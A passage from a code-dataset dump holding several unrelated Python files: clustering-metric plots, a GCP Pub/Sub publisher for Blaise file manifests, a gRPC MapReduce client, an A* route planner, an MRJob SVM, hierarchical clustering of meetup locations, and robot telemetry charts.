Bar(\n\t\tx=clusterCountList,\n\t\ty=homogeneityScoreList,\n\t\tname='Homogeneity Score',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(0, 255, 0)'\n\t\t)\n\t)\n\ttrace1 = Bar(\n\t\tx=clusterCountList,\n\t\ty=completenessScoreList,\n\t\tname='Completeness Score',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(255, 0, 0)'\n\t\t)\n\t)\n\tdata = Data([trace0,trace1])\n\n\tif len(vMeasureScoreList) > 0:\n\t\ttrace2 = Bar(\n\t\t\tx=clusterCountList,\n\t\t\ty=vMeasureScoreList,\n\t\t\tname='V Measure Score',\n\t\t\tmarker=Marker(\n\t\t\t\tcolor='rgb(0, 0, 255)'\n\t\t\t)\n\t\t)\n\t\tdata = Data([trace0,trace1,trace2])\n\t\tif len(normalizedMutualInfoScore) > 0:\n\t\t\ttrace3 = Bar(\n\t\t\t\tx=clusterCountList,\n\t\t\t\ty=normalizedMutualInfoScore,\n\t\t\t\tname='Normalized Mutual Info 
Score',\n\t\t\t\tmarker=Marker(\n\t\t\t\t\tcolor='rgb(100, 100, 100)'\n\t\t\t\t)\n\t\t\t)\n\t\t\tdata = Data([trace0,trace1,trace2,trace3])\n\t\t\t# if len(adjustedRandScoreList) > 0:\n\t\t\t# \ttrace4 = Bar(\n\t\t\t# \t\tx=clusterCountList,\n\t\t\t# \t\ty=adjustedRandScoreList,\n\t\t\t# \t\tname='Adjusted Rand Score',\n\t\t\t# \t\tmarker=Marker(\n\t\t\t# \t\t\tcolor='rgb(200, 200, 200)'\n\t\t\t# \t\t)\n\t\t\t# \t)\n\t\t\t# \tdata = Data([trace0,trace1,trace2,trace3,trace4])\n\t\n\tlayout = Layout(\n\t\ttitle='Number of Clusters vs Homogeneity and Completeness',\n\t\txaxis=XAxis(\n\t\t\ttitle='Number of Clusters',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='Goodness Measures',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\t\n\tfig = Figure(data=data, layout=layout)\n\tname = 'cluster-measures'\n\tif postfix != None:\n\t\tname += postfix\n\tplot_url = py.plot(fig, filename=name)\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n \n# This is a plot for Goodness of Cluster measure using silhouette_avg\ndef generatePlotSilhouette(username, apiKey, clusterCountList, silhouetteAvgList, postfix):\n\ttls.set_credentials_file(username, apiKey)\n\ttrace = Bar(\n\t\tx=clusterCountList,\n\t\ty=silhouetteAvgList,\n\t\tname='Silhouette Average Score',\n\t\tmarker=Marker(\n\t\t\tcolor='rgb(0, 255, 0)'\n\t\t)\n\t)\n\tdata = Data([trace])\n\tlayout = Layout(\n\t\ttitle='Number of Clusters vs Silhouette Average Score',\n\t\txaxis=XAxis(\n\t\t\ttitle='Number of Clusters',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tyaxis=YAxis(\n\t\t\ttitle='Silhouette Average Score',\n\t\t\ttitlefont=Font(\n\t\t\t\tsize=16,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t),\n\t\t\ttickfont=Font(\n\t\t\t\tsize=14,\n\t\t\t\tcolor='rgb(107, 107, 107)'\n\t\t\t)\n\t\t),\n\t\tlegend=Legend(\n\t\t\tx=0,\n\t\t\ty=1.0,\n\t\t\tbgcolor='rgba(255, 255, 255, 0)',\n\t\t\tbordercolor='rgba(255, 255, 255, 0)'\n\t\t),\n\t\tbarmode='group',\n\t\tbargap=0.15,\n\t\tbargroupgap=0.1\n\t)\n\tfig = Figure(data=data, layout=layout)\n\tname = 'silhouette-average-score'\n\tif postfix != None:\n\t\tname += postfix\n\tplot_url = py.plot(fig, filename=name)\n\tlogging.debug('Check out the URL: '+plot_url+' for your plot')\n\ndef plotSilhouetteSamples(username, apiKey, fileToRead, postfix=None):\n\tevaluatedClusterResultsDict = json.loads(gzip.open(fileToRead, \"rb\").read().decode(\"utf8\"))\n#\tevaluatedClusterResultsDict = json.loads(open(fileToRead, 'r').read().decode('utf8'))\n\t\n\tclusterCountList = []\n\t\n\tsilhouetteAvgList = []\n\t\n\tfor clusterCount, clusterData in evaluatedClusterResultsDict.iteritems():\n\t\tif clusterCount != 'appVectors':\n\t\t\tclusterCountList.append(int(str(clusterCount).replace('Loop','')))\n\t\t\t#logging.debug('In', clusterCount, 'we have silhouette_avg of', clusterInfo['silhouette_avg']\n\t\t\tsilhouetteAvgList.append(clusterData['silhouette_avg'])\n\n\t#print 
silhouetteAvgList\n\tgeneratePlotSilhouette(username, apiKey, clusterCountList, silhouetteAvgList, postfix)\n\ndef plotGroundTruthResults(username, apiKey, fileToRead, postfix=None):\n\tevaluatedClusterResultsDict = json.loads(gzip.open(fileToRead, \"rb\").read().decode(\"utf8\"))\n#\tevaluatedClusterResultsDict = json.loads(open(fileToRead, 'r').read().decode('utf8'))\n\t\n\tclusterCountList = []\n\t\n\thomogeneityScoreList = []\n\tcompletenessScoreList = []\n\tadjustedRandScoreList = []\n\tadjustedMutualInfoScoreList = []\n\tvMeasureScoreList = []\n\tnormalizedMutualInfoScore = []\n\t\n\tfor clusterCount, clusterData in evaluatedClusterResultsDict.iteritems():\n\t\tif clusterCount != 'appVectors':\n\t\t\tclusterCountList.append(int(str(clusterCount).replace(\"Loop\",\"\")))\n\t\t\tclusterInfo = clusterData['clusterEvaluationResults']\n\t\t\tif \"adjusted_rand_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have adjusted_rand_score of\", clusterInfo[\"adjusted_rand_score\"]\n\t\t\t\tadjustedRandScoreList.append(float(clusterInfo[\"adjusted_rand_score\"]))\n\t\t\tif \"adjusted_mutual_info_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have adjusted_mutual_info_score of\", clusterInfo[\"adjusted_mutual_info_score\"]\n\t\t\t\tadjustedMutualInfoScoreList.append(float(clusterInfo[\"adjusted_mutual_info_score\"]))\n\t\t\tif \"homogeneity_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have homogeneity_score of\", clusterInfo[\"homogeneity_score\"]\n\t\t\t\thomogeneityScoreList.append(float(clusterInfo[\"homogeneity_score\"]))\n\t\t\tif \"completeness_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have completeness_score of\", clusterInfo[\"completeness_score\"]\n\t\t\t\tcompletenessScoreList.append(float(clusterInfo[\"completeness_score\"]))\n\t\t\tif \"v_measure_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have v_measure_score of\", clusterInfo[\"v_measure_score\"]\n\t\t\t\tvMeasureScoreList.append(float(clusterInfo[\"v_measure_score\"]))\n\t\t\tif \"normalized_mutual_info_score\" in clusterInfo:\n\t\t\t\t#logging.debug('In\", clusterCount, \"we have v_measure_score of\", clusterInfo[\"v_measure_score\"]\n\t\t\t\tnormalizedMutualInfoScore.append(float(clusterInfo[\"normalized_mutual_info_score\"]))\n\n\t#print clusterCountList, homogeneityScoreList, completenessScoreList, adjustedRandScoreList, adjustedMutualInfoScoreList, vMeasureScoreList\n\tgenerateGroundTruthResults(username, apiKey, clusterCountList, homogeneityScoreList, completenessScoreList, adjustedRandScoreList, adjustedMutualInfoScoreList, vMeasureScoreList, normalizedMutualInfoScore, postfix)\n\ndef main(argv):\n\tif len(sys.argv) != 4:\n\t\tsys.stderr.write('Usage: python plotResults.py username apiKey resultsFile\\n')\n\t\tsys.exit(1)\n\n\tusername = sys.argv[1]\n\tapiKey = sys.argv[2]\n\tresultsFile = sys.argv[3]\n\n\tstartTime = time.time()\n\tgenerateAppPermissionsRequestedFrequencyHistogram(username, apiKey)\n\tgeneratePermissionsRequestedByAppFrequencyHistogram(username, apiKey)\n\tplotSilhouetteSamples(username, apiKey, resultsFile, postfix=None)\n\tplotGroundTruthResults(username, apiKey, resultsFile, postfix=None)\n\texecutionTime = str((time.time()-startTime)*1000)\n\tlogging.debug('Execution time was: '+executionTime+' ms')\n\nif __name__ == 
\"__main__\":\n\tmain(sys.argv)","sub_path":"code/behaviorSystemCallAnalysis/plotResults.py","file_name":"plotResults.py","file_ext":"py","file_size_in_byte":11589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418751478","text":"import os\nimport base64\nimport binascii\nimport json\nfrom google.cloud import pubsub_v1\nimport blaise_dds\n\n\ndef createMsg(data):\n msg = {\n \"version\": 3,\n \"schemaVersion\": 1,\n \"files\": [],\n \"sensitivity\": \"High\",\n \"sourceName\": \"gcp_blaise_\" + os.environ[\"ENV\"],\n \"description\": \"\",\n \"dataset\": \"\",\n \"iterationL1\": \"\",\n \"iterationL2\": \"\",\n \"iterationL3\": \"\",\n \"iterationL4\": \"\",\n \"manifestCreated\": \"\",\n \"fullSizeMegabytes\": \"\",\n }\n\n files = {}\n filename = data[\"name\"] + \":\" + data[\"bucket\"]\n files[\"sizeBytes\"] = data[\"size\"]\n files[\"name\"] = filename\n decodehash = base64.b64decode(data[\"md5Hash\"])\n encodehash = binascii.hexlify(decodehash)\n files[\"md5sum\"] = str(\n encodehash, \"utf-8\"\n ) # Note GCP uses md5hash - however, MiNiFi needs it to be md5sum\n files[\"relativePath\"] = \".\\\\\"\n msg[\"files\"].append(files)\n fileExtn = data[\"name\"].split(\".\")[1].lower()\n fileType = data[\"name\"].split(\"_\")[0].lower()\n\n runPubSub = False\n\n if fileExtn == \"zip\" and fileType == \"mi\":\n msg[\n \"description\"\n ] = \"Management Information files uploaded to GCP bucket from Blaise5\"\n msg[\"dataset\"] = \"blaise_mi\"\n msg[\"iterationL1\"] = os.getenv(\"ON-PREM-SUBFOLDER\")\n msg[\"iterationL2\"] = \"\"\n msg[\"iterationL3\"] = \"\"\n msg[\"iterationL4\"] = \"\"\n elif fileExtn == \"zip\" and fileType == \"dd\":\n msg[\"description\"] = \"Data Delivery files uploaded to GCP bucket from Blaise5\"\n msg[\"dataset\"] = \"blaise_dde\"\n msg[\"iterationL1\"] = \"SYSTEMS\"\n msg[\"iterationL2\"] = os.getenv(\"ON-PREM-SUBFOLDER\")\n msg[\"iterationL3\"] = data[\"name\"][3:6].upper()\n msg[\"iterationL4\"] = data[\"name\"][3:11].upper()\n else:\n print(\n \"File extension {} not found or file type {} is invalid\".format(\n fileExtn, fileType\n )\n )\n return None\n\n msg[\"manifestCreated\"] = data[\"timeCreated\"]\n msg[\"fullSizeMegabytes\"] = \"{:.6f}\".format(int(data[\"size\"]) / 1000000)\n print(f\"Message created {msg}\")\n return msg\n\n\ndef publishMsg(data, context):\n project_id = os.getenv(\"PROJECT_ID\", None)\n topic_name = os.getenv(\"TOPIC_NAME\", None)\n dds_client = blaise_dds.Client(blaise_dds.Config.from_env())\n try:\n dds_client.update_state(data[\"name\"], \"in_nifi_bucket\")\n\n print(f\"Configuration: Project ID: {project_id}\")\n print(f\"Configuration: Topic Name: {topic_name}\")\n print(f\"Configuration: File name: {data['name']}\")\n print(f\"Configuration: Bucket Name: {data['bucket']}\")\n print(\n f\"Configuration: ON-PREM-SUBFOLDER: {os.getenv('ON-PREM-SUBFOLDER', None)}\"\n )\n\n if project_id is None:\n print(\"project_id not set, publish failed\")\n return\n\n msg = createMsg(data)\n print(f\"Message {msg}\")\n if msg is not None:\n client = pubsub_v1.PublisherClient()\n topic_path = client.topic_path(project_id, topic_name)\n msg_bytes = bytes(json.dumps(msg), encoding=\"utf-8\")\n client.publish(topic_path, data=msg_bytes)\n print(f\"Message published\")\n dds_client.update_state(data[\"name\"], \"nifi_notified\")\n\n except Exception as error:\n dds_client.update_state(data[\"name\"], \"errored\", 
repr(error))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"562459272","text":"import logging\nimport sys\nimport argparse\n\nimport grpc\n\nimport mapreduce_pb2\nimport mapreduce_pb2_grpc\n\n## === USER INPUT ====\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '--p2inputs',\n default='inputs',\n help='provide an string path to input .txt files'\n)\nparser.add_argument(\n '--p2intermediate',\n default='outputs/intermediate',\n help='provide an string path where to intermediate output files'\n)\nparser.add_argument(\n '--p2outputs',\n default='outputs/out',\n help='provide an string path where to save the final output files'\n)\nparser.add_argument(\n '--M',\n default=4,\n help='how many buckets? (int)'\n)\nclinput = parser.parse_args()\n## ===================\n \ndef run():\n\n channel = grpc.insecure_channel('localhost:50051')\n stub = mapreduce_pb2_grpc.MapReduceStub(channel)\n \n # Map:\n print(\"=== Starting map.\")\n print(\"=== Map files:\")\n responses = stub.Map(mapreduce_pb2.MapRequest(\n input_path = clinput.p2inputs, \n output_path = clinput.p2intermediate, \n M = int(clinput.M)\n ))\n for response in responses:\n print(response.path)\n \n # Reduce:\n print(\"=== Map complete. Starting reduce. \")\n print(\"=== Reduce files:\")\n responses = stub.Reduce(mapreduce_pb2.ReduceRequest(\n input_path = clinput.p2intermediate, \n output_path = clinput.p2outputs\n ))\n for response in responses:\n print(response.path)\n \n # Terminate:\n print(\"=== Reduce complete. Final output files at: {}.\".format(clinput.p2outputs))\n print(\"=== Task complete. Servers and client will now exit.\")\n response = stub.Stop(mapreduce_pb2.StopRequest(shouldstop = True))\n sys.exit(0)\n \n\nif __name__ == '__main__':\n logging.basicConfig()\n run()","sub_path":"mapreduce_client.py","file_name":"mapreduce_client.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"11614699","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# https://en.wikipedia.org/wiki/A*_search_algorithm\n# http://www.geeksforgeeks.org/a-search-algorithm/\n# https://docs.python.org/2/library/heapq.html\n\nimport math\nimport heapq\n\n\ndef euclidean_distance(start, end):\n return math.hypot(start[0] - end[0], start[1] - end[1])\n\ndef heuristic_cost_estimate(start, end):\n return euclidean_distance(start, end)\n\ndef reconstruct_path(cameFrom, current):\n total_path = [current]\n while current in cameFrom:\n current = cameFrom[current] \n total_path.insert(0, current)\n return total_path\n\n\ndef shortest_path(M, start, goal):\n print('shortest path called') \n\n assert (start in M.intersections), \"Start is not defined in the map.\" \n assert (goal in M.intersections), \"Goal is not defined in the map.\" \n\n closedSet = set()\n openSet = set()\n pq = []\n cameFrom = {}\n gScore = {start: 0.0}\n fScore = {start: heuristic_cost_estimate(M.intersections[start], M.intersections[goal])}\n shortest_path_found = False\n\n heapq.heappush(pq, (fScore[start], start))\n openSet.add(start)\n\n while openSet:\n current = heapq.heappop(pq)[1] \n if current == goal:\n shortest_path_found = True\n break\n\n openSet.remove(current) \n closedSet.add(current)\n\n for neighbor in M.roads[current]:\n if neighbor in closedSet:\n continue\n \n tentative_gScore = gScore[current] + 
euclidean_distance(M.intersections[current], M.intersections[neighbor]) \n            if neighbor in gScore and tentative_gScore >= gScore[neighbor]:\n                continue\n            \n            cameFrom[neighbor] = current\n            gScore[neighbor] = tentative_gScore\n            fScore[neighbor] = gScore[neighbor] + heuristic_cost_estimate(M.intersections[neighbor], M.intersections[goal]) \n            \n            if neighbor not in openSet:\n                heapq.heappush(pq, (fScore[neighbor], neighbor))\n                openSet.add(neighbor)\n        \n\n    if not shortest_path_found:\n        raise ValueError('No path found.')\n\n    return reconstruct_path(cameFrom, goal)\n","sub_path":"Project 3 - Implement Route Planner/student_code.py","file_name":"student_code.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} {"seq_id":"82579847","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport pickle\nimport random\nimport numpy as np\n\nfrom mrjob.job import MRJob\n\nclass MRsvm(MRJob):\n    DEFAULT_INPUT_PROTOCOL = 'json_value'\n\n    def __init__(self, *args, **kwargs):\n        super(MRsvm, self).__init__(*args, **kwargs)\n        self.data = pickle.load(open('/home/cavin/Code/BookPractice/Python/MachineLearninginAction/ch15/svmDat27'))\n        self.w = 0\n        self.eta = 0.69\n        self.dataList = []\n        self.k = 
self.options.batchsize\n        self.numMappers = 1\n        self.t = 1\n\n    def configure_options(self):\n        super(MRsvm, self).configure_options()\n        self.add_passthrough_option('--iterations', dest='iterations', default=2, type='int', \n                                    help='T: number of iterations to run')\n        self.add_passthrough_option('--batchsize', dest='batchsize', default=100, type='int',\n                                    help='k: number of data points in a batch')\n    \n    def steps(self):\n        return ([self.mr(mapper=self.map, mapper_final=self.map_fin, reducer=self.reduce)] * self.options.iterations)\n\n    def map(self, mapperId, inVals):\n        if False:\n            yield\n        if inVals[0] == 'w':\n            self.w = inVals[1]\n        elif inVals[0] == 'x':\n            self.dataList.append(inVals[1])\n        elif inVals[0] == 't':\n            self.t = inVals[1]\n\n    def map_fin(self):\n        labels = self.data[:, -1]\n        X = self.data[:, 0:-1]\n        if self.w == 0:\n            self.w = [0.001] * np.shape(X)[1]\n        for index in self.dataList:\n            p = np.mat(self.w) * X[index, :].T\n            if labels[index] * p < 1.0:\n                yield (1, ['u', index])\n        yield (1, ['w', self.w])\n        yield (1, ['t', self.t])\n\n    def reduce(self, _, packedVals):\n        for valArr in packedVals:\n            if valArr[0] == 'u':\n                self.dataList.append(valArr[1])\n            elif valArr[0] == 'w':\n                self.w = valArr[1]\n            elif valArr[0] == 't':\n                self.t = valArr[1]\n        labels = self.data[:, -1]\n        X = self.data[:, 0:-1]\n        wMat = np.mat(self.w)\n        wDelta = np.mat(np.zeros(len(self.w)))\n        for index in self.dataList:\n            wDelta += float(labels[index]) * X[index, :]\n        eta = 1.0 / (2.0 * self.t)\n        wMat = (1.0 - 1.0 / self.t) * wMat + (eta / self.k) * wDelta\n        for mapperNum in range(1, self.numMappers+1):\n            yield (mapperNum, ['w', wMat.tolist()[0]])\n            if self.t < self.options.iterations:\n                yield (mapperNum, ['t', self.t + 1])\n                for j in range(self.k / self.numMappers):\n                    # pick a random data-point index; stdlib random.randint needs both bounds\n                    yield (mapperNum, ['x', random.randint(0, np.shape(self.data)[0] - 1)])\n\nif __name__ == '__main__':\n    MRsvm.run()\n","sub_path":"MachineLearninginAction/ch15/mrSVM.py","file_name":"mrSVM.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} {"seq_id":"619269816","text":"from meetup_data import attendees_locations_tuples\nfrom matplotlib import pyplot\nfrom k_means import vector_mean\n\ndef distance(vector_a, vector_b):\n    sum_of_squared_component_diffs = sum([\n        (component_a - component_b) ** 2\n        for component_a, component_b\n        in zip(vector_a, vector_b)\n    ])\n    return sum_of_squared_component_diffs ** (1/2)\n\n\n# represent leaves as single tuples\n# non-leaf nodes are represented as (merge_order, leaf_list)\n\ndef is_leaf(cluster):\n    return len(cluster) == 1\n\ndef get_children(cluster):\n    if is_leaf(cluster):\n        raise TypeError('a leaf cluster has no children')\n    else:\n        return cluster[1]\n    \ndef get_values(cluster):\n    if is_leaf(cluster):\n        return cluster\n    else:\n        return [\n            value\n            for child in get_children(cluster)\n            for value in get_values(child)\n        ]\n\ndef cluster_distance(cluster1, cluster2, distance_agg=max):\n    return distance_agg([\n        distance(input_1, input_2)\n        for input_1 in get_values(cluster1)\n        for input_2 in get_values(cluster2)\n    ])\n\ndef get_merge_order(cluster):\n    if is_leaf(cluster):\n        return float('inf')\n    else:\n        return cluster[0]\n\ndef bottom_up_cluster(inputs, distance_agg=max):\n    clusters = [ (input,) for input in inputs ]\n\n    while len(clusters) > 1:\n        cluster_1, cluster_2 = min(\n            [\n                (cluster_1, cluster_2)\n                for index_1, cluster_1 in enumerate(clusters) \n                for cluster_2 in clusters[:index_1]\n            ],\n\n            key=\n            lambda cluster_pair: 
cluster_distance(cluster_pair[0], cluster_pair[1], distance_agg)\n )\n\n clusters = [\n cluster\n for cluster in clusters\n if cluster != cluster_1 and cluster != cluster_2\n ]\n\n merged_cluster = (len(clusters), [cluster_1, cluster_2])\n\n clusters.append(merged_cluster)\n\n return clusters[0]\n\ndef generate_clusters(base_cluster, num_clusters):\n clusters = [ base_cluster ]\n\n while len(clusters) < num_clusters:\n next_cluster = min(clusters, key=get_merge_order)\n clusters = [\n cluster \n for cluster in clusters\n if cluster != next_cluster\n ]\n clusters.extend(get_children(next_cluster))\n \n return clusters\n\n\nbase_cluster = bottom_up_cluster(attendees_locations_tuples)\n# print(base_cluster)\n\nthree_clusters = [\n get_values(cluster)\n for cluster\n in generate_clusters(base_cluster, 3)\n]\n\nprint('three clusters = %s' % three_clusters)\n\nplot_zip_parameters = zip(\n [1, 2, 3],\n three_clusters,\n ['D', 'o', '*'],\n ['r', 'g', 'b'],\n)\n\nfor index, cluster, marker, color in plot_zip_parameters:\n xs, ys = zip(*cluster)\n pyplot.scatter(xs, ys, color=color, marker=marker)\n x, y = vector_mean(cluster)\n pyplot.plot(x, y, marker='$' + str(index) + '$', color='black')\n\npyplot.title('User Locations-3 Bottom-Up Clusters, Min')\npyplot.xlabel('blocks East of city center')\npyplot.ylabel('blocks North of city center')\npyplot.show()\n","sub_path":"20-exercises/bottoms_up_clustering.py","file_name":"bottoms_up_clustering.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86522151","text":"import pandas as pd\nimport plotly.graph_objs as go\nimport datetime\nimport numpy as np\n\n# Use this file to read in your data and prepare the plotly visualizations. 
The path to the data files are in\n# `data/robot_data.csv`\n\ndef prepare_data(filepath):\n \"\"\"Returns cleaned and augmented data for visualization\n \n Args: \n filepath: filepath to the dataset\n \n Returns: \n df: dataframe of cleaned and augmented data\n \n \"\"\"\n df = pd.read_csv(filepath)\n \n # convert datetimes column to datetime datatype\n df['datetimes'] = df['datetimes'].map(lambda x: datetime.datetime.strptime(x, \"%d%m%y-%H:%M:%S.%f\"))\n \n # create column of interval times\n intervals = np.zeros(df.shape[0])\n \n for i, dt in enumerate(df['datetimes']):\n if i == 0:\n prev_dt = dt\n continue\n\n intervals[i] = (intervals[i-1] + ((dt - prev_dt).microseconds / 1e6))\n\n prev_dt = dt\n \n # convert to series\n intervals = pd.Series(intervals)\n\n # create new column\n df.insert(0, \"time\", intervals) \n \n # change to categorical feature\n def change_to_category(x):\n if x == 1:\n x = 'normal'\n elif x == 3:\n x = 'protective_stop'\n elif x == 8:\n x = 'violation'\n elif x == 9:\n x = 'fault'\n else:\n x = 'error'\n\n return x\n \n df['safety_mode'] = df['safety_mode'].apply(change_to_category)\n \n \n # get accelerations\n base_acc = np.zeros(df.shape[0])\n shoulder_acc = np.zeros(df.shape[0])\n elbow_acc = np.zeros(df.shape[0])\n wrist1_acc = np.zeros(df.shape[0])\n wrist2_acc = np.zeros(df.shape[0])\n wrist3_acc = np.zeros(df.shape[0])\n\n def get_acceleration(array, joint):\n for i, vel in enumerate(df[f'actual_qd_{joint}']):\n if i == 0:\n prev_vel = vel\n continue\n\n d_time = df['time'][i] - df['time'][i-1]\n \n if d_time == 0.0:\n d_time = 0.008\n \n d_vel = vel - prev_vel\n\n acc = d_vel / d_time\n\n array[i] = acc\n\n prev_vel = vel\n\n return array\n\n base_acc_series = pd.Series(get_acceleration(base_acc, 0))\n shoulder_acc_series = pd.Series(get_acceleration(shoulder_acc, 1))\n elbow_acc_series = pd.Series(get_acceleration(elbow_acc, 2))\n wrist1_acc_series = pd.Series(get_acceleration(wrist1_acc, 3))\n wrist2_acc_series = pd.Series(get_acceleration(wrist2_acc, 4))\n wrist3_acc_series = pd.Series(get_acceleration(wrist3_acc, 5))\n \n df.insert(13, 'actual_qdd_0', base_acc_series)\n df.insert(14, 'actual_qdd_1', shoulder_acc_series)\n df.insert(15, 'actual_qdd_2', elbow_acc_series)\n df.insert(16, 'actual_qdd_3', wrist1_acc_series)\n df.insert(17, 'actual_qdd_4', wrist2_acc_series)\n df.insert(18, 'actual_qdd_5', wrist3_acc_series)\n \n # drop unwanted columns, also drop datetimes\n df.drop(['datetimes', 'robot_mode'], axis=1, inplace=True)\n \n # drop duplicated data\n df = df.drop_duplicates()\n \n return df\n\n\n\ndef return_figures(df):\n \"\"\"Creates four plotly visualizations\n\n Args:\n df: dataframe of cleaned and augmented data\n\n Returns:\n list (dict): list containing the four plotly visualizations\n\n \"\"\"\n \n time = df['time'].tolist()\n\n # first chart plots joint currents vs time as a line chart\n \n graph_one = []\n \n \n graph_one.append([\n \n go.Scatter(\n x = time,\n y = df['actual_current_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_current_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_current_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_current_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_current_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_current_5'].tolist(),\n mode = 'lines',\n name = 
'Twist')\n \n \n ])\n\n layout_one = dict(title = 'Graph of Joint Currents vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Currents (A)'),\n )\n \n # second chart plots joint voltages vs time as a line chart\n graph_two = []\n \n graph_two.append([\n \n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_joint_voltage_5'].tolist(),\n mode = 'lines',\n name = 'Twist')\n \n \n ])\n\n layout_two = dict(title = 'Graph of Joint Voltages vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Voltages (A)'),\n )\n \n # third chart plots joint temperatures vs time as a line chart\n graph_three = []\n \n graph_three.append([\n \n go.Scatter(\n x = time,\n y = df['joint_temperatures_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['joint_temperatures_5'].tolist(),\n mode = 'lines',\n name = 'Twist') \n ])\n\n layout_three = dict(title = 'Graph of Joint Temperatures vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Temperatures (degC)'),\n )\n \n # fourth chart plots joint speeds vs time as a line chart\n graph_four = []\n \n graph_four.append([\n \n go.Scatter(\n x = time,\n y = df['actual_qd_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_qd_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_qd_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_qd_3'].tolist(),\n mode = 'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_qd_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_qd_5'].tolist(),\n mode = 'lines',\n name = 'Twist') \n ])\n\n layout_four = dict(title = 'Graph of Joint Velocities vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Velocities(rad/s)'),\n )\n \n # fifth chart plots joint accelerations vs time as a line chart\n graph_five = []\n \n graph_five.append([\n \n go.Scatter(\n x = time,\n y = df['actual_qdd_0'].tolist(),\n mode = 'lines',\n name = 'Slide'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_1'].tolist(),\n mode = 'lines',\n name = 'Lower'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_2'].tolist(),\n mode = 'lines',\n name = 'Upper'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_3'].tolist(),\n mode = 